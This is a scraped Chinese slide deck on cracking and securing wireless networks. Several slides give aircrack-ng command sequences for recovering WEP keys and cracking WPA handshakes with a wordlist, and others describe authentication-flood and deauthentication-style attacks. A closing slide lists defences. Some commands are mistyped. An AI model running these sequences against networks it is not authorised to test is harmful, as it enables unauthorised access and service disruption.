150 likes | 336 Views
无线的破解与安全. 姜 辉. 提纲. 相关背景 WEP 的破解( 1 ) WEP 的破解 ( 2 ) WPA 的破解 无线安全. 相关背景. 无线网卡的选择 芯片。 Athetos , Prism , Ralink ( USB ) 无线网卡的硬件 / 固件版本 无线网卡的功率及 规格 基本知识 SSID ( Service Set Identifier, 服务集标识符) 一个唯一的标识符,最大长度 32 WAP ( wireless Application Protocol ,无线应用协议)
E N D
无线的破解与安全 姜 辉
提纲 相关背景 WEP的破解(1) WEP的破解(2) WPA的破解 无线安全
相关背景 无线网卡的选择 芯片。Athetos,Prism,Ralink(USB) 无线网卡的硬件/固件版本 无线网卡的功率及规格 基本知识 SSID(Service Set Identifier,服务集标识符) 一个唯一的标识符,最大长度32 WAP(wireless Application Protocol,无线应用协议) AP((wireless Access Point)) 无线接入点
相关背景 几个比较出名linux系统 BackTrack WiFiSlax WiFiWay Linux系统下无线探测工具 Kismet(Bt4自带) Wicrawl(扩展功能较好) AirSnort(具有自动抓包并破解WEP的能力) Bt4下使用iwlist或者Internet-》Wicd Network Manager
相关背景 几个比较出名linux系统 BackTrack WiFiSlax WiFiWay Linux系统下无线探测工具 Kismet(Bt4自带) Wicrawl(扩展功能较好) AirSnort(具有自动抓包并破解WEP的能力) Bt4下使用iwlist或者Internet-》Wicd Network Manager
相关背景 Aircrack-ng
WEP破解技术(1) Ifconfig –a wlan0 up 载入无线网卡的驱动程序 首先要在vmware中连接 探测无线AP的信息 airmon-ng start wlan0 监控频道 成功后会开启一个监控网卡,如 mon0 airodump–ng –w dump –channel 6 mon0 aireplay-ng -3 –b ap’s MAC –h client’s MAC –x 1024 mon0 aircrack-ng –x –f 2 dump-01.cap
WEP破解技术(2) Ifconfig –a wlan0 up 载入无线网卡的驱动程序 首先要在vmware中连接 探测无线AP的信息 airmon-ng start wlan0 监控频道 成功后会开启一个监控网卡,如 mon0 airodump –ng –ivs –c 监控频道–w dump –channel 6 mon0 aireplay-ng -1 0 –e ap’sessidap’s MAC –h client’s MAC (网卡) –x mon0
WEP破解技术(2) aireplay-ng -4 –b AP’s MAC –h client’s MAC mon0 Chopchop攻击 生产可用的密钥数据流文件 会生产一个cap和一个xor的文件 packetforge-ng –o –a AP’MAC –h client’s MAC -k 255.255.255.255 -1 255.255.255.255 –y fragment xor file –w dump1 airepaly-ng -2 –r dump1 mon0 aircrack-ng dump*.ivs
WAP破解技术 airmon-ng start wlan0 没有正常的加载驱动 airodump-ng -w dump–channel 频道 mon0 Dump为数据包 aireplay-ng -o 攻击次数 AP’s MAC –h client’s MAC mon0 WPA握手的验证 zcat/pentest/password/dictionaries/ wordlist.txt.Z >password.txt 生产字典(bt4 自带) aircrack-ng –w password.txt -z dump01.cap 破解
身份验证洪泛攻击 攻击原理 关联的客户端向AP发送大量伪造身份验证请求 当请求超出AP的承载能力时断开与客户的连接 攻击实现 使用看似合法的但是随机生成MAC伪造工作站 向AP发送大量的虚假请求
身份验证失败攻击 攻击原理 关联的客户端向AP伪造客户端无效验证帧 AP将受害客户端更新为状态1 攻击实现 关联客户端伪造某合法客户端向AP发送无效的验证帧 AP认为该验证请求无效 将受害者的状态更新为1
总结 尽量使用相对安全的防御措施 隐藏无线局域网的SSID号码 使用WPA加密 实施MAC地址过滤 进行802.1x认证 控制无线信号的范围